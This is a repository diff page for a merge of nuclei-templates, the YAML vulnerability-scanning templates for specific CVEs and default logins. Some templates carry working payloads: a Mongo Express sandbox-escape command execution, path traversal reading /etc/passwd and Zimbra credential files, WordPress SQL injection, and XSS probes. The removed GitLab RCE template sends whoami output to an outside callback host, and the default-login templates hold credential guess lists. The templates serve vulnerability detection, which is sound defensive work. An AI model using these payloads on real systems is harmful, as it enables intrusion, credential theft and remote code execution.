daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates

patch-1
root 2022-01-25 19:10:17 +02:00
parent 5cfa266293 173f0ef2d3
commit e7d42abe0b
34 changed files with 1069 additions and 56 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
cves/2001/CVE-2001-1473.yaml
View File

@ -6,6 +6,7 @@ info:
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
remediation: Upgrade to SSH 2.4 or later.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
@ -24,3 +25,5 @@ network:
- type: word
words:
- "SSH-1"
# Updated by Chris on 2022/01/21

28
cves/2009/CVE-2009-5020.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2009-5020
info:
name: AWStats < 6.95 - Open redirect
author: pdteam
severity: medium
description: Open redirect vulnerability in awredir.pl in AWStats before 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference: https://nvd.nist.gov/vuln/detail/CVE-2009-5020
tags: cve,cve2020,redirect,awstats
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2009-5020
cwe-id: CWE-601
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

34
cves/2012/CVE-2012-4547.yaml Normal file
View File

@ -0,0 +1,34 @@
id: CVE-2012-4547
info:
name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
reference:
- https://www.exploit-db.com/exploits/36164
- https://nvd.nist.gov/vuln/detail/CVE-2012-4547
tags: cve,cve2020,xss,awstats
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

36
cves/2013/CVE-2013-7091.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2013-7091
info:
name: Zimbra Collaboration Server 7.2.2/8.0.2 LFI
author: rubina119
severity: critical
description: Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zimbra 7.2.2 and 8.0.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the skin parameter. This can be leveraged to execute arbitrary code by obtaining LDAP credentials and accessing the service/admin/soap API.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2013-7091
- https://www.exploit-db.com/exploits/30085
- https://www.exploit-db.com/exploits/30472
tags: cve,cve2013,zimbra,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00"
- "{{BaseURL}}/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "zimbra_server_hostname"
- "zimbra_ldap_userdn"
- "zimbra_ldap_password"
- "ldap_postfix_password"
- "ldap_amavis_password"
- "ldap_nginx_password"
- "mysql_root_password"
condition: or
- type: regex
regex:
- "root=.*:0:0"

51
cves/2020/CVE-2020-24391.yaml Normal file
View File

@ -0,0 +1,51 @@
id: CVE-2020-24391
info:
name: Mongo Express Remote Code Execution
author: leovalcante
severity: critical
description: Mongo-express uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to RCE in the context of the node server.
reference:
- https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
- https://nvd.nist.gov/vuln/detail/CVE-2020-24391
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-24391
tags: cve,cve2020,mongo,express,rce,intrusive
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST /checkValid HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++
- |
GET /public/css/{{randstr}}.css HTTP/1.1
Host: {{Hostname}}
req-condition: true
cookie-reuse: true
matchers-condition: and
matchers:
- type: regex
part: body_3
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"

143
cves/2021/CVE-2021-22205.yaml
View File

@ -1,63 +1,128 @@
id: CVE-2021-22205
info:
name: GitLab CE/EE Unauthenticated RCE using ExifTool
author: pdteam
name: Fingerprinting GitLab CE/EE Unauthenticated RCE using ExifTool - Passive Detection
author: GitLab Red Team
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
reference:
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator
- https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
- https://censys.io/blog/cve-2021-22205-it-was-a-gitlab-smash/
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
tags: cve,cve2021,gitlab,rce,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2021-22205
cwe-id: CWE-20
tags: cve,cve2021,gitlab,rce
requests:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- method: GET
path:
- "{{BaseURL}}/users/sign_in"
- |
POST /uploads/user HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse: true
matchers-condition: and
redirects: true
max-redirects: 3
matchers:
- type: word
words:
- 'Failed to process image'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 422
- "015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df"
- "02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b"
- "051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce"
- "08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290"
- "0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59"
- "0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753"
- "1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f"
- "14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4"
- "1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4"
- "20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6"
- "27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959"
- "292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369"
- "2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae"
- "30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f"
- "318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2"
- "33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1"
- "335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac"
- "34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86"
- "3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087"
- "340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86"
- "38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d"
- "3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd"
- "39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514"
- "39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09"
- "3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e"
- "3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb"
- "40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3"
- "4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1"
- "450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54"
- "455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8"
- "4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b"
- "45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44"
- "473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117"
- "4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2"
- "4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e"
- "4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160"
- "504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb"
- "52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c"
- "530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf"
- "5440e2dd89d3c803295cc924699c93eb762e75d42178eb3fe8b42a5093075c71"
- "62e4cc014d9d96f9cbf443186289ffd9c41bdfe951565324891dcf38bcca5a51"
- "64e10bc92a379103a268a90a7863903eacb56843d8990fff8410f9f109c3b87a"
- "655ad8aea57bdaaad10ff208c7f7aa88c9af89a834c0041ffc18c928cc3eab1f"
- "67ac5da9c95d82e894c9efe975335f9e8bdae64967f33652cd9a97b5449216d2"
- "69a1b8e44ba8b277e3c93911be41b0f588ac7275b91a184c6a3f448550ca28ca"
- "6ae610d783ba9a520b82263f49d2907a52090fecb3ac37819cea12b67e6d94fb"
- "70ce56efa7e602d4b127087b0eca064681ecdd49b57d86665da8b081da39408b"
- "7310c45f08c5414036292b0c4026f281a73cf8a01af82a81257dd343f378bbb5"
- "73a21594461cbc9a2fb00fc6f94aec1a33ccf435a7d008d764ddd0482e08fc8d"
- "77566acc818458515231d0a82c131a42890d771ea998b9f578dc38e0eb7e517f"
- "78812856e55613c6803ecb31cc1864b7555bf7f0126d1dfa6f37376d37d3aeab"
- "79837fd1939f90d58cc5a842a81120e8cecbc03484362e88081ebf3b7e3830e9"
- "7b1dcbacca4f585e2cb98f0d48f008acfec617e473ba4fd88de36b946570b8b9"
- "7f1c7b2bfaa6152740d453804e7aa380077636cad101005ed85e70990ec20ec5"
- "81c5f2c7b2c0b0abaeb59585f36904031c21b1702c24349404df52834fbd7ad3"
- "83dc10f687305b22e602ba806619628a90bd4d89be7c626176a0efec173ecff1"
- "93ebf32a4bd988b808c2329308847edd77e752b38becc995970079a6d586c39b"
- "969119f639d0837f445a10ced20d3a82d2ea69d682a4e74f39a48a4e7b443d5e"
- "9b4e140fad97320405244676f1a329679808e02c854077f73422bd8b7797476b"
- "9c095c833db4364caae1659f4e4dcb78da3b5ec5e9a507154832126b0fe0f08e"
- "a0c92bafde7d93e87af3bc2797125cba613018240a9f5305ff949be8a1b16528"
- "a9308f85e95b00007892d451fd9f6beabcd8792b4c5f8cd7524ba7e941d479c9"
- "ac9b38e86b6c87bf8db038ae23da3a5f17a6c391b3a54ad1e727136141a7d4f5"
- "ae0edd232df6f579e19ea52115d35977f8bdbfa9958e0aef2221d62f3a39e7d8"
- "aeddf31361633b3d1196c6483f25c484855e0f243e7f7e62686a4de9e10ec03b"
- "b50bfeb87fe7bb245b31a0423ccfd866ca974bc5943e568ce47efb4cd221d711"
- "b64a1277a08c2901915525143cd0b62d81a37de0a64ec135800f519cb0836445"
- "bb1565ffd7c937bea412482ed9136c6057be50356f1f901379586989b4dfe2ca"
- "be9a23d3021354ec649bc823b23eab01ed235a4eb730fd2f4f7cdb2a6dee453a"
- "bec9544b57b8b2b515e855779735ad31c3eacf65d615b4bfbd574549735111e7"
- "bf1ba5d5d3395adc5bad6f17cc3cb21b3fb29d3e3471a5b260e0bc5ec7a57bc4"
- "bf1c397958ee5114e8f1dadc98fa9c9d7ddb031a4c3c030fa00c315384456218"
- "c8d8d30d89b00098edab024579a3f3c0df2613a29ebcd57cdb9a9062675558e4"
- "c923fa3e71e104d50615978c1ab9fcfccfcbada9e8df638fc27bf4d4eb72d78c"
- "d0850f616c5b4f09a7ff319701bce0460ffc17ca0349ad2cf7808b868688cf71"
- "d161b6e25db66456f8e0603de5132d1ff90f9388d0a0305d2d073a67fd229ddb"
- "d56f0577fbbbd6f159e9be00b274270cb25b60a7809871a6a572783b533f5a3c"
- "d812b9bf6957fafe35951054b9efc5be6b10c204c127aa5a048506218c34e40f"
- "dc6b3e9c0fad345e7c45a569f4c34c3e94730c33743ae8ca055aa6669ad6ac56"
- "def1880ada798c68ee010ba2193f53a2c65a8981871a634ae7e18ccdcd503fa3"
- "e2578590390a9eb10cd65d130e36503fccb40b3921c65c160bb06943b2e3751a"
- "e4b6f040fe2e04c86ed1f969fc72710a844fe30c3501b868cb519d98d1fe3fd0"
- "eb078ffe61726e3898dc9d01ea7955809778bde5be3677d907cbd3b48854e687"
- "ec9dfedd7bd44754668b208858a31b83489d5474f7606294f6cc0128bb218c6d"
- "ed4780bb05c30e3c145419d06ad0ab3f48bd3004a90fb99601f40c5b6e1d90fd"
- "ef53a4f4523a4a0499fb892d9fb5ddb89318538fef33a74ce0bf54d25777ea83"
- "f154ef27cf0f1383ba4ca59531058312b44c84d40938bc8758827023db472812"
- "f7d1309f3caef67cb63bd114c85e73b323a97d145ceca7d6ef3c1c010078c649"
- "f9ab217549b223c55fa310f2007a8f5685f9596c579f5c5526e7dcb204ba0e11"
condition: or
extractors:
- type: regex
name: csrf-token
internal: true
group: 1
regex:
- 'csrf-token" content="(.*?)" />\n\n<meta'
- type: regex
name: whoami
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z]+)'
- '(?:application-)(\S{64})(?:\.css)'

43
cves/2021/CVE-2021-24750.yaml Normal file
View File

@ -0,0 +1,43 @@
id: CVE-2021-24750
info:
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI
author: cckuakilong
severity: high
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks.
reference:
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "266f89556d2b38ff067b580fb305c522"
- type: status
status:
- 200

32
cves/2021/CVE-2021-24838.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2021-24838
info:
name: AnyComment <= 0.2.21 - Open Redirect
author: noobexploiter
severity: medium
description: The plugin has an API endpoint which passes user input via the redirect parameter to the wp_redirect() function without being validated first, leading to an Open Redirect issue, which according to the vendor, is a feature.
reference:
- https://wpscan.com/vulnerability/562e81ad-7422-4437-a5b4-fcab9379db82
- https://nvd.nist.gov/vuln/detail/CVE-2021-24838
tags: wordpress,wp-plugin,open-redirect
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24838
cwe-id: CWE-601
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:
- 302

13
cves/2021/CVE-2021-29156.yaml
View File

@ -1,12 +1,17 @@
id: CVE-2021-29156
info:
name: LDAP Injection In Openam
name: LDAP Injection In OpenAM
author: melbadry9,xelkomy
severity: high
tags: cve,cve2021,openam,ldap,injection
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
reference:
https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
https://hackerone.com/reports/1278050
https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
https://portswigger.net/research/hidden-oauth-attack-vectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -24,3 +29,5 @@ requests:
- type: dsl
dsl:
- 'contains(body, "jato.pageSession") && status_code==200'
# Enhanced by cs on 2022/01/24

48
cves/2021/CVE-2021-39350.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2021-39350
info:
name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
author: gy741
severity: medium
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
reference:
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-39350
cwe-id: CWE-79
tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

30
cves/2021/CVE-2021-39433.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2021-39433
info:
name: BIQS IT Biqs-drive v1.83 LFI
author: Veshraj
severity: high
description: A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
reference:
- https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
tags: lfi,biqsdrive,cve,cve2021
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2021-39433
requests:
- method: GET
path:
- "{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

7
cves/2021/CVE-2021-40438.yaml
View File

File diff suppressed because one or more lines are too long

38
cves/2021/CVE-2021-43810.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-43810
info:
name: Admidio - Reflected XSS
author: gy741
severity: medium
description: Admidio is a free open source user management system for websites of organizations and groups. A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The Reflected XSS vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. This issue is patched in version 4.0.12.
reference:
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-43810
cwe-id: CWE-79
tags: cve,cve2021,admidio,xss
requests:
- method: GET
path:
- '{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'please click <a href="javascript://%0aalert(document.domain)" target="_self">'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

35
cves/2022/CVE-2022-0218.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-0218
info:
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
author: hexcat
severity: high
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
reference:
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
- https://wordpress.org/plugins/wp-html-mail/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0218
tags: wordpress,wp-plugin,xss,cve,cve2022
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?rest_route=/whm/v3/themesettings"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"background":'
- '"footer":'
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200

35
cves/2022/CVE-2022-23178.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2022-23178
info:
name: Crestron Device - Credentials Disclosure
author: gy741
severity: critical
description: An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.
reference:
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-009/-credential-disclosure-in-web-interface-of-crestron-device
- https://nvd.nist.gov/vuln/detail/CVE-2022-23178
- https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E
tags: cve,cve2022,crestron,disclosure
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2022-23178
cwe-id: CWE-287
requests:
- method: GET
path:
- "{{BaseURL}}/aj.html?a=devi"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- '"uname":'
- '"upassword":'
condition: and

46
default-logins/gophish/gophish-default-login.yaml Normal file
View File

@ -0,0 +1,46 @@
id: gophish-default-login
info:
name: Gophish < v0.10.1 default credentials
author: arcc,dhiyaneshDK
severity: high
tags: gophish,default-login
requests:
- raw:
- |
GET /login HTTP/1.1
Host: {{Hostname}}
- |
POST /login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&csrf_token={{replace(url_encode(html_unescape(csrf_token)), "+", "%2B")}}
attack: pitchfork
payloads:
user:
- admin
pass:
- gophish
cookie-reuse: true
extractors:
- type: regex
name: csrf_token
part: body
internal: true
group: 1
regex:
- 'name="csrf_token" value="(.+?)"'
matchers:
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'location: /login')"
- "contains(tolower(all_headers), 'location: /')"
- "contains(tolower(all_headers), 'gophish')"
- "status_code==302"
condition: and

38
default-logins/jboss/jmx-default-login.yaml Normal file
View File

@ -0,0 +1,38 @@
id: jmx-default-login
info:
name: JBoss JMX Console Weak Credential
author: paradessia
severity: high
tags: jboss,jmx,default-login
requests:
- raw:
- |
GET /jmx-console/ HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(user + ':' + pass)}}
attack: clusterbomb
payloads:
user:
- admin
- root
pass:
- admin
- 12345
- 123456
- 1234
- 123456789
- 123qwe
- root
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'JMImplementation'

46
default-logins/versa/versa-default-login.yaml Normal file
View File

@ -0,0 +1,46 @@
id: versa-default-login
info:
name: Versa Networks SD-WAN Application Default Login
author: davidmckennirey
severity: high
description: Searches for default admin credentials for the Versa Networks SD-WAN application.
tags: default-login,versa,sdwan
requests:
- raw:
- |
GET /versa/login.html HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
- |
POST /versa/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{user}}&password={{pass}}&sso=systemRadio
attack: pitchfork
payloads:
user:
- Administrator
pass:
- versa123
cookie-reuse: true
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_2 == 302'
- "contains(tolower(all_headers_2), 'jsessionid')"
- "contains(tolower(all_headers_2), 'location: /versa/index.html')"
condition: and
- type: dsl
dsl:
- "contains(tolower(all_headers_2), '/login?error=true')"
